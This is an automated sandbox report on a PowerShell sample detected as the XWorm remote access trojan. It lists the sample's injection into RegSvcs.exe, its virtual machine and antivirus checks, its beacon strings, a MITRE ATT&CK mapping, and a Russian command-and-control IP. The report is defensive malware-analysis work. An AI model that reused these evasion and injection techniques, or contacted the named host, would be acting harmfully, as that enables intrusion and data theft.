Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3666	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3647	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7662	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2178	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7AF008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"			Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002857000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\^q@\^q-PING!<Xwormmm>Program Manager<Xwormmm>2034781
Source: RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-^q
Source: RegSvcs.exe, 00000003.00000002.3280175291.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegSvcs.exe, 00000003.00000002.3280175291.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^qt
Source: RegSvcs.exe, 00000003.00000002.3280175291.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2034781
Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q-PING!<Xwormmm>Program Manager<Xwormmm>2034781Te^q
Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 00000003.00000002.3280175291.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5252, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 00000003.00000002.3280175291.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5252, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	212 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	131 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	212 Process Injection	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
92.255.57.155.ps1	8%	Virustotal		Browse
92.255.57.155.ps1	13%	ReversingLabs	Win32.Trojan.Generic

Name	Malicious	Antivirus Detection	Reputation
92.255.57.155	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1680199968.000001B58AA09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000000.00000002.1680199968.000001B58A454000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1680199968.000001B58AA09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	false	high
http://upx.sf.net	Amcache.hve.10.dr	false	high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1680199968.000001B589171000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1680199968.000001B589171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
92.255.57.155	unknown	Russian Federation		42253	TELSPRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581903
Start date and time:	2024-12-29 09:48:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	92.255.57.155.ps1
Detection:	MAL
Classification:	mal100.troj.evad.winPS1@7/10@0/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 96% Number of executed functions: 63 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .ps1 Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.12.23.50, 13.107.246.63, 40.126.53.10
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6820 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:48:56	API Interceptor	8x Sleep call for process: powershell.exe modified
03:49:00	API Interceptor	4368467x Sleep call for process: RegSvcs.exe modified
03:51:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
92.255.57.155	anyrunsample.ps1	Get hash	malicious	Unknown	Browse	92.255.57.155/1/1.png
92.255.57.155	https://reviewgustereports.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	92.255.57.155/1/1.png

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELSPRU	png2obj1_XClient.exe	Get hash	malicious	XWorm	Browse	92.255.57.155
	Dm35sdidf3.exe	Get hash	malicious	XWorm	Browse	92.255.57.155
	QP2uO3eN2p.ps1	Get hash	malicious	XWorm	Browse	92.255.57.155
	WErY5oc4hl.ps1	Get hash	malicious	XWorm	Browse	92.255.57.155
	NLXwvLjXPh.ps1	Get hash	malicious	XWorm	Browse	92.255.57.155
	mhqxUdpe7V.ps1	Get hash	malicious	XWorm	Browse	92.255.57.155
	MiGFg375KJ.exe	Get hash	malicious	XWorm	Browse	92.255.57.155
	anyrunsample.ps1	Get hash	malicious	Unknown	Browse	92.255.57.155
	sEOELQpFOB.lnk	Get hash	malicious	RedLine	Browse	92.255.57.75

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_6ffd24152b5e9a3a3eb1fb64c4ad5c89541278d_74bcc9ed_e7b8dc66-00cb-4169-9a41-bd6311868630\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.213876266779332
Encrypted:	false
